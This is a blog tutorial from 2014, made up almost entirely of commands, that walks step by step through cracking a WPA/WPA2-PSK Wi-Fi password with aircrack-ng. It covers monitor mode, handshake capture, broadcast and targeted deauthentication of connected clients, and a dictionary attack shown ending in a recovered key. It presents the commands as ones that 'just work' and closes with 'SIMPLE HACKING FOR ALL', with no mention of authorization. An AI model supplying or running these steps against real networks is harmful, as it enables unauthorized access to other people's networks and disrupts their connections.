Crack Wi-Fi with WPA/WPA2-PSK pin security using Aircrack-ng

Posted by Unknown October 13, 2014

Crack Wi-Fi with WPA/WPA2-PSK pin security using Aircrack-ng

This article is a summary of effective commands that just work.

With the help a these commands you will be able to crack WPA/WPA2 Wi-Fi Access Points which use PSK (Pre-Shared Key) encryption.

The objective is to capture the WPA/WPA2 authentication handshake and thencrack the PSK using aircrack-ng.

The full tutorial about WPA/WPA2 cracking can be found here.

Here are the basic steps we will be going through:

0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

0. Install the Latest Aircrack-ng

Install the required dependencies :

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Download and install the latest aircrack-ng :

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-beta3
$ sudo make
$ sudo make install

Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

$ aircrack-ng --help | head -3

  Aircrack-ng 1.2 beta3 r2393 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

1. Start the Wireless Interface in Monitor Mode

Find and stop all processes that could cause trouble :

$ sudo airmon-ng check kill

Start the wireless interface in monitor mode :

$ sudo airmon-ng start wlan0

Notice that airmon-ng enabled monitor-mode on mon0 :

Interface Chipset  Driver

wlan0  Intel 6235 iwlwifi - [phy0]
    (monitor mode enabled on mon0)

So, the correct interface name to use in later parts of the tutorial is mon0.

2. Start Airodump-ng to Collect Authentication Handshake

Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.

It can be done with airodump-ng command :

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

Option	Description
-c	The channel for the wireless network
--bssid	The MAC address of the access point
-w	The file name prefix for the file which will contain authentication handshake
mon0	The wireless interface
--ignore-negative-one	Removes 'fixed channel : -1' message

Now wait until airodump-ng captures a handshake... or go to the step #3 if you want to force this process.

After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.

This means airodump-ng has successfully captured the handshake.

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client

This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.

Send DeAuth to broadcast :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed DeAuth (attack is more effective when it is targeted) :
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

Option	Description
--deauth 100	The number of de-authenticate frames you want to send (0 for unlimited)
-a	The MAC address of the access point
-c	The MAC address of the client
mon0	The wireless interface
--ignore-negative-one	Removes 'fixed channel : -1' message

4. Run Aircrack-ng to Crack WPA/WPA2-PSK

To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command :

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Option	Description
-w	The name of the dictionary file
-b	The MAC address of the access point
WPAcrack.cap	The name of the file that contains the authentication handshake

                         Aircrack-ng 1.2 beta3 r2393

                   [00:08:11] 548872 keys tested (1425.24 k/s)

                           KEY FOUND! [ 987654321 ]

      Master Key     : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 

      Transient Key  : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 

      EAPOL HMAC     : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

SIMPLE HACKING FOR ALL